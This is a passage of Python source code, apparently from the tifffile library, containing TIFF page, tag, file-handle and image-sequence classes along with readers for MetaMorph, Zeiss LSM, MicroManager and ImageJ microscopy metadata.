elif rgbonly and self.is_rgb and 'extra_samples' in self.tags:
# return only RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for i, exs in enumerate(extra_samples):
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
result = result[..., [0, 1, 2, 3+i]]
else:
result = result[:, [0, 1, 2, 3+i]]
break
else:
if self.is_contig:
result = result[..., :3]
else:
result = result[:, :3]
if squeeze:
try:
result.shape = self.shape
except ValueError:
warnings.warn("failed to reshape from %s to %s" % (
str(result.shape), str(self.shape)))
if scale_mdgel and self.parent.is_mdgel:
# MD Gel stores private metadata in the second page
tags = self.parent.pages[1]
if tags.md_file_tag in (2, 128):
scale = tags.md_scale_pixel
scale = scale[0] / scale[1] # rational
result = result.astype('float32')
if tags.md_file_tag == 2:
result **= 2 # squary root data format
result *= scale
if closed:
# TODO: file remains open if an exception occurred above
fh.close()
return result
def _is_memmappable(self, rgbonly, colormapped):
"""Return if image data in file can be memory mapped."""
if not self.parent.filehandle.is_file or not self.is_contiguous:
return False
return not (self.predictor or
(rgbonly and 'extra_samples' in self.tags) or
(colormapped and self.is_palette) or
({'big': '>', 'little': '<'}[sys.byteorder] !=
self.parent.byteorder))
@lazyattr
def is_contiguous(self):
"""Return offset and size of contiguous data, else None.
Excludes prediction and colormapping.
"""
if self.compression or self.bits_per_sample not in (8, 16, 32, 64):
return
if self.is_tiled:
if (self.image_width != self.tile_width or
self.image_length % self.tile_length or
self.tile_width % 16 or self.tile_length % 16):
return
if ('image_depth' in self.tags and 'tile_depth' in self.tags and
(self.image_length != self.tile_length or
self.image_depth % self.tile_depth)):
return
offsets = self.tile_offsets
byte_counts = self.tile_byte_counts
else:
offsets = self.strip_offsets
byte_counts = self.strip_byte_counts
if len(offsets) == 1:
return offsets[0], byte_counts[0]
if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1]
or byte_counts[i+1] == 0 # no data/ignore offset
for i in range(len(offsets)-1)):
return offsets[0], sum(byte_counts)
def __str__(self):
"""Return string containing information about page."""
s = ', '.join(s for s in (
' x '.join(str(i) for i in self.shape),
str(numpy.dtype(self.dtype)),
'%s bit' % str(self.bits_per_sample),
self.photometric if 'photometric' in self.tags else '',
self.compression if self.compression else 'raw',
'|'.join(t[3:] for t in (
'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej',
'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy',
'is_sgi', 'is_reduced', 'is_tiled',
'is_contiguous') if getattr(self, t))) if s)
return "Page %i: %s" % (self.index, s)
def __getattr__(self, name):
"""Return tag value."""
if name in self.tags:
value = self.tags[name].value
setattr(self, name, value)
return value
raise AttributeError(name)
@lazyattr
def uic_tags(self):
"""Consolidate UIC tags."""
if not self.is_stk:
raise AttributeError("uic_tags")
tags = self.tags
result = Record()
result.number_planes = tags['uic2tag'].count
if 'image_description' in tags:
result.plane_descriptions = self.image_description.split(b'\x00')
if 'uic1tag' in tags:
result.update(tags['uic1tag'].value)
if 'uic3tag' in tags:
result.update(tags['uic3tag'].value) # wavelengths
if 'uic4tag' in tags:
result.update(tags['uic4tag'].value) # override uic1 tags
uic2tag = tags['uic2tag'].value
result.z_distance = uic2tag.z_distance
result.time_created = uic2tag.time_created
result.time_modified = uic2tag.time_modified
try:
result.datetime_created = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_created, uic2tag.time_created)]
result.datetime_modified = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_modified, uic2tag.time_modified)]
except ValueError as e:
warnings.warn("uic_tags: %s" % e)
return result
@lazyattr
def imagej_tags(self):
"""Consolidate ImageJ metadata."""
if not self.is_imagej:
raise AttributeError("imagej_tags")
tags = self.tags
if 'image_description_1' in tags:
# MicroManager
result = imagej_description(tags['image_description_1'].value)
else:
result = imagej_description(tags['image_description'].value)
if 'imagej_metadata' in tags:
try:
result.update(imagej_metadata(
tags['imagej_metadata'].value,
tags['imagej_byte_counts'].value,
self.parent.byteorder))
except Exception as e:
warnings.warn(str(e))
return Record(result)
@lazyattr
def is_rgb(self):
"""True if page contains a RGB image."""
return ('photometric' in self.tags and
self.tags['photometric'].value == 2)
@lazyattr
def is_contig(self):
"""True if page contains a contiguous image."""
return ('planar_configuration' in self.tags and
self.tags['planar_configuration'].value == 1)
@lazyattr
def is_palette(self):
"""True if page contains a palette-colored image and not OME or STK."""
try:
# turn off color mapping for OME-TIFF and STK
if self.is_stk or self.is_ome or self.parent.is_ome:
return False
except IndexError:
pass # OME-XML not found in first page
return ('photometric' in self.tags and
self.tags['photometric'].value == 3)
@lazyattr
def is_tiled(self):
"""True if page contains tiled image."""
return 'tile_width' in self.tags
@lazyattr
def is_reduced(self):
"""True if page is a reduced image of another image."""
return bool(self.tags['new_subfile_type'].value & 1)
@lazyattr
def is_mdgel(self):
"""True if page contains md_file_tag tag."""
return 'md_file_tag' in self.tags
@lazyattr
def is_mediacy(self):
"""True if page contains Media Cybernetics Id tag."""
return ('mc_id' in self.tags and
self.tags['mc_id'].value.startswith(b'MC TIFF'))
@lazyattr
def is_stk(self):
"""True if page contains UIC2Tag tag."""
return 'uic2tag' in self.tags
@lazyattr
def is_lsm(self):
"""True if page contains LSM CZ_LSM_INFO tag."""
return 'cz_lsm_info' in self.tags
@lazyattr
def is_fluoview(self):
"""True if page contains FluoView MM_STAMP tag."""
return 'mm_stamp' in self.tags
@lazyattr
def is_nih(self):
"""True if page contains NIH image header."""
return 'nih_image_header' in self.tags
@lazyattr
def is_sgi(self):
"""True if page contains SGI image and tile depth tags."""
return 'image_depth' in self.tags and 'tile_depth' in self.tags
@lazyattr
def is_ome(self):
"""True if page contains OME-XML in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'<?xml version='))
@lazyattr
def is_shaped(self):
"""True if page contains shape in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'shape=('))
@lazyattr
def is_imagej(self):
"""True if page contains ImageJ description."""
return (
('image_description' in self.tags and
self.tags['image_description'].value.startswith(b'ImageJ=')) or
('image_description_1' in self.tags and # Micromanager
self.tags['image_description_1'].value.startswith(b'ImageJ=')))
@lazyattr
def is_micromanager(self):
"""True if page contains Micro-Manager metadata."""
return 'micromanager_metadata' in self.tags
class TiffTag(object):
"""A TIFF tag structure.
Attributes
----------
name : string
Attribute name of tag.
code : int
Decimal code of tag.
dtype : str
Datatype of tag data. One of TIFF_DATA_TYPES.
count : int
Number of values.
value : various types
Tag data as Python object.
value_offset : int
Location of value in file, if any.
All attributes are read-only.
"""
__slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset',
'_offset', '_value', '_type')
class Error(Exception):
pass
def __init__(self, arg, **kwargs):
"""Initialize instance from file or arguments."""
self._offset = None
if hasattr(arg, '_fh'):
self._fromfile(arg, **kwargs)
else:
self._fromdata(arg, **kwargs)
def _fromdata(self, code, dtype, count, value, name=None):
"""Initialize instance from arguments."""
self.code = int(code)
self.name = name if name else str(code)
self.dtype = TIFF_DATA_TYPES[dtype]
self.count = int(count)
self.value = value
self._value = value
self._type = dtype
def _fromfile(self, parent):
"""Read tag structure from open file. Advance file cursor."""
fh = parent.filehandle
byteorder = parent.byteorder
self._offset = fh.tell()
self.value_offset = self._offset + parent.offset_size + 4
fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size]
data = fh.read(size)
code, dtype = struct.unpack(byteorder + fmt[:2], data[:4])
count, value = struct.unpack(byteorder + fmt[2:], data[4:])
self._value = value
self._type = dtype
if code in TIFF_TAGS:
name = TIFF_TAGS[code][0]
elif code in CUSTOM_TAGS:
name = CUSTOM_TAGS[code][0]
else:
name = str(code)
try:
dtype = TIFF_DATA_TYPES[self._type]
except KeyError:
raise TiffTag.Error("unknown tag data type %i" % self._type)
fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1])
size = struct.calcsize(fmt)
if size > parent.offset_size or code in CUSTOM_TAGS:
pos = fh.tell()
tof = {4: 'I', 8: 'Q'}[parent.offset_size]
self.value_offset = offset = struct.unpack(byteorder+tof, value)[0]
if offset < 0 or offset > parent.filehandle.size:
raise TiffTag.Error("corrupt file - invalid tag value offset")
elif offset < 4:
raise TiffTag.Error("corrupt value offset for tag %i" % code)
fh.seek(offset)
if code in CUSTOM_TAGS:
readfunc = CUSTOM_TAGS[code][1]
value = readfunc(fh, byteorder, dtype, count)
if isinstance(value, dict): # numpy.core.records.record
value = Record(value)
elif code in TIFF_TAGS or dtype[-1] == 's':
value = struct.unpack(fmt, fh.read(size))
else:
value = read_numpy(fh, byteorder, dtype, count)
fh.seek(pos)
else:
value = struct.unpack(fmt, value[:size])
if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325):
# scalar value if not strip/tile offsets/byte_counts
if len(value) == 1:
value = value[0]
if (dtype.endswith('s') and isinstance(value, bytes)
and self._type != 7):
# TIFF ASCII fields can contain multiple strings,
# each terminated with a NUL
value = stripascii(value)
self.code = code
self.name = name
self.dtype = dtype
self.count = count
self.value = value
def _correct_lsm_bitspersample(self, parent):
"""Correct LSM bitspersample tag.
Old LSM writers may use a separate region for two 16-bit values,
although they fit into the tag value element of the tag.
"""
if self.code == 258 and self.count == 2:
# TODO: test this. Need example file.
warnings.warn("correcting LSM bitspersample tag")
fh = parent.filehandle
tof = {4: '<I', 8: '<Q'}[parent.offset_size]
self.value_offset = struct.unpack(tof, self._value)[0]
fh.seek(self.value_offset)
self.value = struct.unpack("<HH", fh.read(4))
def as_str(self):
"""Return value as human readable string."""
return ((str(self.value).split('\n', 1)[0]) if (self._type != 7)
else '<undefined>')
def __str__(self):
"""Return string containing information about tag."""
return ' '.join(str(getattr(self, s)) for s in self.__slots__)
class TiffSequence(object):
"""Sequence of image files.
The data shape and dtype of all files must match.
Properties
----------
files : list
List of file names.
shape : tuple
Shape of image sequence.
axes : str
Labels of axes in shape.
Examples
--------
>>> tifs = TiffSequence("test.oif.files/*.tif") # doctest: +SKIP
>>> tifs.shape, tifs.axes # doctest: +SKIP
((2, 100), 'CT')
>>> data = tifs.asarray() # doctest: +SKIP
>>> data.shape # doctest: +SKIP
(2, 100, 256, 256)
"""
_patterns = {
'axes': r"""
# matches Olympus OIF and Leica TIFF series
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
"""}
class ParseError(Exception):
pass
def __init__(self, files, imread=TiffFile, pattern='axes',
*args, **kwargs):
"""Initialize instance from multiple files.
Parameters
----------
files : str, or sequence of str
Glob pattern or sequence of file names.
imread : function or class
Image read function or class with asarray function returning numpy
array from single file.
pattern : str
Regular expression pattern that matches axes names and sequence
indices in file names.
By default this matches Olympus OIF and Leica TIFF series.
"""
if isinstance(files, basestring):
files = natural_sorted(glob.glob(files))
files = list(files)
if not files:
raise ValueError("no files found")
#if not os.path.isfile(files[0]):
# raise ValueError("file not found")
self.files = files
if hasattr(imread, 'asarray'):
# redefine imread
_imread = imread
def imread(fname, *args, **kwargs):
with _imread(fname) as im:
return im.asarray(*args, **kwargs)
self.imread = imread
self.pattern = self._patterns.get(pattern, pattern)
try:
self._parse()
if not self.axes:
self.axes = 'I'
except self.ParseError:
self.axes = 'I'
self.shape = (len(files),)
self._start_index = (0,)
self._indices = tuple((i,) for i in range(len(files)))
def __str__(self):
"""Return string with information about image sequence."""
return "\n".join([
self.files[0],
'* files: %i' % len(self.files),
'* axes: %s' % self.axes,
'* shape: %s' % str(self.shape)])
def __len__(self):
return len(self.files)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
pass
def asarray(self, memmap=False, *args, **kwargs):
"""Read image data from all files and return as single numpy array.
If memmap is True, return an array stored in a binary file on disk.
The args and kwargs parameters are passed to the imread function.
Raise IndexError or ValueError if image shapes don't match.
"""
im = self.imread(self.files[0], *args, **kwargs)
shape = self.shape + im.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=im.dtype, shape=shape)
else:
result = numpy.zeros(shape, dtype=im.dtype)
result = result.reshape(-1, *im.shape)
for index, fname in zip(self._indices, self.files):
index = [i-j for i, j in zip(index, self._start_index)]
index = numpy.ravel_multi_index(index, self.shape)
im = self.imread(fname, *args, **kwargs)
result[index] = im
result.shape = shape
return result
def _parse(self):
"""Get axes and shape from file names."""
if not self.pattern:
raise self.ParseError("invalid pattern")
pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE)
matches = pattern.findall(self.files[0])
if not matches:
raise self.ParseError("pattern doesn't match file names")
matches = matches[-1]
if len(matches) % 2:
raise self.ParseError("pattern doesn't match axis name and index")
axes = ''.join(m for m in matches[::2] if m)
if not axes:
raise self.ParseError("pattern doesn't match file names")
indices = []
for fname in self.files:
matches = pattern.findall(fname)[-1]
if axes != ''.join(m for m in matches[::2] if m):
raise ValueError("axes don't match within the image sequence")
indices.append([int(m) for m in matches[1::2] if m])
shape = tuple(numpy.max(indices, axis=0))
start_index = tuple(numpy.min(indices, axis=0))
shape = tuple(i-j+1 for i, j in zip(shape, start_index))
if product(shape) != len(self.files):
warnings.warn("files are missing. Missing data are zeroed")
self.axes = axes.upper()
self.shape = shape
self._indices = indices
self._start_index = start_index
class Record(dict):
"""Dictionary with attribute access.
Can also be initialized with numpy.core.records.record.
"""
__slots__ = ()
def __init__(self, arg=None, **kwargs):
if kwargs:
arg = kwargs
elif arg is None:
arg = {}
try:
dict.__init__(self, arg)
except (TypeError, ValueError):
for i, name in enumerate(arg.dtype.names):
v = arg[i]
self[name] = v if v.dtype.char != 'S' else stripnull(v)
def __getattr__(self, name):
return self[name]
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __str__(self):
"""Pretty print Record."""
s = []
lists = []
for k in sorted(self):
try:
if k.startswith('_'): # does not work with byte
continue
except AttributeError:
pass
v = self[k]
if isinstance(v, (list, tuple)) and len(v):
if isinstance(v[0], Record):
lists.append((k, v))
continue
elif isinstance(v[0], TiffPage):
v = [i.index for i in v if i]
s.append(
("* %s: %s" % (k, str(v))).split("\n", 1)[0]
[:PRINT_LINE_LEN].rstrip())
for k, v in lists:
l = []
for i, w in enumerate(v):
l.append("* %s[%i]\n %s" % (k, i,
str(w).replace("\n", "\n ")))
s.append('\n'.join(l))
return '\n'.join(s)
class TiffTags(Record):
"""Dictionary of TiffTag with attribute access."""
def __str__(self):
"""Return string with information about all tags."""
s = []
for tag in sorted(self.values(), key=lambda x: x.code):
typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1])
line = "* %i %s (%s) %s" % (
tag.code, tag.name, typecode, tag.as_str())
s.append(line[:PRINT_LINE_LEN].lstrip())
return '\n'.join(s)
class FileHandle(object):
"""Binary file handle.
* Handle embedded files (for CZI within CZI files).
* Allow to re-open closed files (for multi file formats such as OME-TIFF).
* Read numpy arrays and records from file like objects.
Only binary read, seek, tell, and close are supported on embedded files.
When initialized from another file handle, do not use it unless this
FileHandle is closed.
Attributes
----------
name : str
Name of the file.
path : str
Absolute path to file.
size : int
Size of file in bytes.
is_file : bool
If True, file has a filno and can be memory mapped.
All attributes are read-only.
"""
__slots__ = ('_fh', '_arg', '_mode', '_name', '_dir',
'_offset', '_size', '_close', 'is_file')
def __init__(self, arg, mode='rb', name=None, offset=None, size=None):
"""Initialize file handle from file name or another file handle.
Parameters
----------
arg : str, File, or FileHandle
File name or open file handle.
mode : str
File open mode in case 'arg' is a file name.
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
"""
self._fh = None
self._arg = arg
self._mode = mode
self._name = name
self._dir = ''
self._offset = offset
self._size = size
self._close = True
self.is_file = False
self.open()
def open(self):
"""Open or re-open file."""
if self._fh:
return # file is open
if isinstance(self._arg, basestring):
# file name
self._arg = os.path.abspath(self._arg)
self._dir, self._name = os.path.split(self._arg)
self._fh = open(self._arg, self._mode)
self._close = True
if self._offset is None:
self._offset = 0
elif isinstance(self._arg, FileHandle):
# FileHandle
self._fh = self._arg._fh
if self._offset is None:
self._offset = 0
self._offset += self._arg._offset
self._close = False
if not self._name:
if self._offset:
name, ext = os.path.splitext(self._arg._name)
self._name = "%s@%i%s" % (name, self._offset, ext)
else:
self._name = self._arg._name
self._dir = self._arg._dir
else:
# open file object
self._fh = self._arg
if self._offset is None:
self._offset = self._arg.tell()
self._close = False
if not self._name:
try:
self._dir, self._name = os.path.split(self._fh.name)
except AttributeError:
self._name = "Unnamed stream"
if self._offset:
self._fh.seek(self._offset)
if self._size is None:
pos = self._fh.tell()
self._fh.seek(self._offset, 2)
self._size = self._fh.tell()
self._fh.seek(pos)
try:
self._fh.fileno()
self.is_file = True
except Exception:
self.is_file = False
def read(self, size=-1):
"""Read 'size' bytes from file, or until EOF is reached."""
if size < 0 and self._offset:
size = self._size
return self._fh.read(size)
def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'):
"""Return numpy.memmap of data stored in file."""
if not self.is_file:
raise ValueError("Can not memory map file without fileno.")
return numpy.memmap(self._fh, dtype=dtype, mode=mode,
offset=self._offset + offset,
shape=shape, order=order)
def read_array(self, dtype, count=-1, sep=""):
"""Return numpy array from file.
Work around numpy issue #2230, "numpy.fromfile does not accept
StringIO object" https://github.com/numpy/numpy/issues/2230.
"""
try:
return numpy.fromfile(self._fh, dtype, count, sep)
except IOError:
if count < 0:
size = self._size
else:
size = count * numpy.dtype(dtype).itemsize
data = self._fh.read(size)
return numpy.fromstring(data, dtype, count, sep)
def read_record(self, dtype, shape=1, byteorder=None):
"""Return numpy record from file."""
try:
rec = numpy.rec.fromfile(self._fh, dtype, shape,
byteorder=byteorder)
except Exception:
dtype = numpy.dtype(dtype)
if shape is None:
shape = self._size // dtype.itemsize
size = product(sequence(shape)) * dtype.itemsize
data = self._fh.read(size)
return numpy.rec.fromstring(data, dtype, shape,
byteorder=byteorder)
return rec[0] if shape == 1 else rec
def tell(self):
"""Return file's current position."""
return self._fh.tell() - self._offset
def seek(self, offset, whence=0):
"""Set file's current position."""
if self._offset:
if whence == 0:
self._fh.seek(self._offset + offset, whence)
return
elif whence == 2:
self._fh.seek(self._offset + self._size + offset, 0)
return
self._fh.seek(offset, whence)
def close(self):
"""Close file."""
if self._close and self._fh:
self._fh.close()
self._fh = None
self.is_file = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getattr__(self, name):
"""Return attribute from underlying file object."""
if self._offset:
warnings.warn(
"FileHandle: '%s' not implemented for embedded files" % name)
return getattr(self._fh, name)
@property
def name(self):
return self._name
@property
def dirname(self):
return self._dir
@property
def path(self):
return os.path.join(self._dir, self._name)
@property
def size(self):
return self._size
@property
def closed(self):
return self._fh is None
def read_bytes(fh, byteorder, dtype, count):
"""Read tag data from file and return as byte string."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count).tostring()
def read_numpy(fh, byteorder, dtype, count):
"""Read tag data from file and return as numpy array."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count)
def read_json(fh, byteorder, dtype, count):
"""Read JSON tag data from file and return as object."""
data = fh.read(count)
try:
return json.loads(unicode(stripnull(data), 'utf-8'))
except ValueError:
warnings.warn("invalid JSON `%s`" % data)
def read_mm_header(fh, byteorder, dtype, count):
"""Read MM_HEADER tag from file and return as numpy.rec.array."""
return fh.read_record(MM_HEADER, byteorder=byteorder)
def read_mm_stamp(fh, byteorder, dtype, count):
"""Read MM_STAMP tag from file and return as numpy.array."""
return fh.read_array(byteorder+'f8', 8)
def read_uic1tag(fh, byteorder, dtype, count, plane_count=None):
"""Read MetaMorph STK UIC1Tag from file and return as dictionary.
Return empty dictionary if plane_count is unknown.
"""
assert dtype in ('2I', '1I') and byteorder == '<'
result = {}
if dtype == '2I':
# pre MetaMorph 2.5 (not tested)
values = fh.read_array('<u4', 2*count).reshape(count, 2)
result = {'z_distance': values[:, 0] / values[:, 1]}
elif plane_count:
for i in range(count):
tagid = struct.unpack('<I', fh.read(4))[0]
if tagid in (28, 29, 37, 40, 41):
# silently skip unexpected tags
fh.read(4)
continue
name, value = read_uic_tag(fh, tagid, plane_count, offset=True)
result[name] = value
return result
def read_uic2tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC2Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6)
return {
'z_distance': values[:, 0] / values[:, 1],
'date_created': values[:, 2], # julian days
'time_created': values[:, 3], # milliseconds
'date_modified': values[:, 4], # julian days
'time_modified': values[:, 5], # milliseconds
}
def read_uic3tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC3Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2)
return {'wavelengths': values[:, 0] / values[:, 1]}
def read_uic4tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC4Tag from file and return as dictionary."""
assert dtype == '1I' and byteorder == '<'
result = {}
while True:
tagid = struct.unpack('<H', fh.read(2))[0]
if tagid == 0:
break
name, value = read_uic_tag(fh, tagid, plane_count, offset=False)
result[name] = value
return result
def read_uic_tag(fh, tagid, plane_count, offset):
"""Read a single UIC tag value from file and return tag name and value.
UIC1Tags use an offset.
"""
def read_int(count=1):
value = struct.unpack('<%iI' % count, fh.read(4*count))
return value[0] if count == 1 else value
try:
name, dtype = UIC_TAGS[tagid]
except KeyError:
# unknown tag
return '_tagid_%i' % tagid, read_int()
if offset:
pos = fh.tell()
if dtype not in (int, None):
off = read_int()
if off < 8:
warnings.warn("invalid offset for uic tag '%s': %i"
% (name, off))
return name, off
fh.seek(off)
if dtype is None:
# skip
name = '_' + name
value = read_int()
elif dtype is int:
# int
value = read_int()
elif dtype is Fraction:
# fraction
value = read_int(2)
value = value[0] / value[1]
elif dtype is julian_datetime:
# datetime
value = julian_datetime(*read_int(2))
elif dtype is read_uic_image_property:
# ImagePropertyEx
value = read_uic_image_property(fh)
elif dtype is str:
# pascal string
size = read_int()
if 0 <= size < 2**10:
value = struct.unpack('%is' % size, fh.read(size))[0][:-1]
value = stripnull(value)
elif offset:
value = ''
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
elif dtype == '%ip':
# sequence of pascal strings
value = []
for i in range(plane_count):
size = read_int()
if 0 <= size < 2**10:
string = struct.unpack('%is' % size, fh.read(size))[0][:-1]
string = stripnull(string)
value.append(string)
elif offset:
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
else:
# struct or numpy type
dtype = '<' + dtype
if '%i' in dtype:
dtype = dtype % plane_count
if '(' in dtype:
# numpy type
value = fh.read_array(dtype, 1)[0]
if value.shape[-1] == 2:
# assume fractions
value = value[..., 0] / value[..., 1]
else:
# struct format
value = struct.unpack(dtype, fh.read(struct.calcsize(dtype)))
if len(value) == 1:
value = value[0]
if offset:
fh.seek(pos + 4)
return name, value
def read_uic_image_property(fh):
"""Read UIC ImagePropertyEx tag from file and return as dict."""
# TODO: test this
size = struct.unpack('B', fh.read(1))[0]
name = struct.unpack('%is' % size, fh.read(size))[0][:-1]
flags, prop = struct.unpack('<IB', fh.read(5))
if prop == 1:
value = struct.unpack('II', fh.read(8))
value = value[0] / value[1]
else:
size = struct.unpack('B', fh.read(1))[0]
value = struct.unpack('%is' % size, fh.read(size))[0]
return dict(name=name, flags=flags, value=value)
def read_cz_lsm_info(fh, byteorder, dtype, count):
"""Read CS_LSM_INFO tag from file and return as numpy.rec.array."""
assert byteorder == '<'
magic_number, structure_size = struct.unpack('<II', fh.read(8))
if magic_number not in (50350412, 67127628):
raise ValueError("not a valid CS_LSM_INFO structure")
fh.seek(-8, 1)
if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize:
# adjust structure according to structure_size
cz_lsm_info = []
size = 0
for name, dtype in CZ_LSM_INFO:
size += numpy.dtype(dtype).itemsize
if size > structure_size:
break
cz_lsm_info.append((name, dtype))
else:
cz_lsm_info = CZ_LSM_INFO
return fh.read_record(cz_lsm_info, byteorder=byteorder)
def read_cz_lsm_floatpairs(fh):
"""Read LSM sequence of float pairs from file and return as list."""
size = struct.unpack('<i', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_positions(fh):
"""Read LSM positions from file and return as list."""
size = struct.unpack('<I', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_time_stamps(fh):
"""Read LSM time stamps from file and return as list."""
size, count = struct.unpack('<ii', fh.read(8))
if size != (8 + 8 * count):
raise ValueError("lsm_time_stamps block is too short")
# return struct.unpack('<%dd' % count, fh.read(8*count))
return fh.read_array('<f8', count=count)
def read_cz_lsm_event_list(fh):
"""Read LSM events from file and return as list of (time, type, text)."""
count = struct.unpack('<II', fh.read(8))[1]
events = []
while count > 0:
esize, etime, etype = struct.unpack('<IdI', fh.read(16))
etext = stripnull(fh.read(esize - 16))
events.append((etime, etype, etext))
count -= 1
return events
def read_cz_lsm_scan_info(fh):
"""Read LSM scan information from file and return as Record."""
block = Record()
blocks = [block]
unpack = struct.unpack
if 0x10000000 != struct.unpack('<I', fh.read(4))[0]:
# not a Recording sub block
raise ValueError("not a lsm_scan_info structure")
fh.read(8)
while True:
entry, dtype, size = unpack('<III', fh.read(12))
if dtype == 2:
# ascii
value = stripnull(fh.read(size))
elif dtype == 4:
# long
value = unpack('<i', fh.read(4))[0]
elif dtype == 5:
# rational
value = unpack('<d', fh.read(8))[0]
else:
value = 0
if entry in CZ_LSM_SCAN_INFO_ARRAYS:
blocks.append(block)
name = CZ_LSM_SCAN_INFO_ARRAYS[entry]
newobj = []
setattr(block, name, newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_STRUCTS:
blocks.append(block)
newobj = Record()
block.append(newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES:
name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry]
setattr(block, name, value)
elif entry == 0xffffffff:
# end sub block
block = blocks.pop()
else:
# unknown entry
setattr(block, "entry_0x%x" % entry, value)
if not blocks:
break
return block
def read_nih_image_header(fh, byteorder, dtype, count):
"""Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array."""
a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder)
a = a.newbyteorder(byteorder)
a.xunit = a.xunit[:a._xunit_len]
a.um = a.um[:a._um_len]
return a
def read_micromanager_metadata(fh):
"""Read MicroManager non-TIFF settings from open file and return as dict.
The settings can be used to read image data without parsing the TIFF file.
Raise ValueError if file does not contain valid MicroManager metadata.
"""
fh.seek(0)
try:
byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)]
except IndexError:
raise ValueError("not a MicroManager TIFF file")
results = {}
fh.seek(8)
(index_header, index_offset, display_header, display_offset,
comments_header, comments_offset, summary_header, summary_length
) = struct.unpack(byteorder + "IIIIIIII", fh.read(32))
if summary_header != 2355492:
raise ValueError("invalid MicroManager summary_header")
results['summary'] = read_json(fh, byteorder, None, summary_length)
if index_header != 54773648:
raise ValueError("invalid MicroManager index_header")
fh.seek(index_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 3453623:
raise ValueError("invalid MicroManager index_header")
data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count))
results['index_map'] = {
'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5],
'position': data[3::5], 'offset': data[4::5]}
if display_header != 483765892:
raise ValueError("invalid MicroManager display_header")
fh.seek(display_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 347834724:
raise ValueError("invalid MicroManager display_header")
results['display_settings'] = read_json(fh, byteorder, None, count)
if comments_header != 99384722:
raise ValueError("invalid MicroManager comments_header")
fh.seek(comments_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 84720485:
raise ValueError("invalid MicroManager comments_header")
results['comments'] = read_json(fh, byteorder, None, count)
return results
def imagej_metadata(data, bytecounts, byteorder):
"""Return dict from ImageJ metadata tag value."""
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
def read_string(data, byteorder):
return _str(stripnull(data[0 if byteorder == '<' else 1::2]))
def read_double(data, byteorder):
return struct.unpack(byteorder+('d' * (len(data) // 8)), data)
def read_bytes(data, byteorder):
#return struct.unpack('b' * len(data), data)
return numpy.fromstring(data, 'uint8')
metadata_types = { # big endian
b'info': ('info', read_string),
b'labl': ('labels', read_string),
b'rang': ('ranges', read_double),
b'luts': ('luts', read_bytes),
b'roi ': ('roi', read_bytes),
b'over': ('overlays', read_bytes)}
metadata_types.update( # little endian
dict((k[::-1], v) for k, v in metadata_types.items()))
if not bytecounts:
raise ValueError("no ImageJ metadata")
if not data[:4] in (b'IJIJ', b'JIJI'):
raise ValueError("invalid ImageJ metadata")
header_size = bytecounts[0]
if header_size < 12 or header_size > 804:
raise ValueError("invalid ImageJ metadata header size")
ntypes = (header_size - 4) // 8
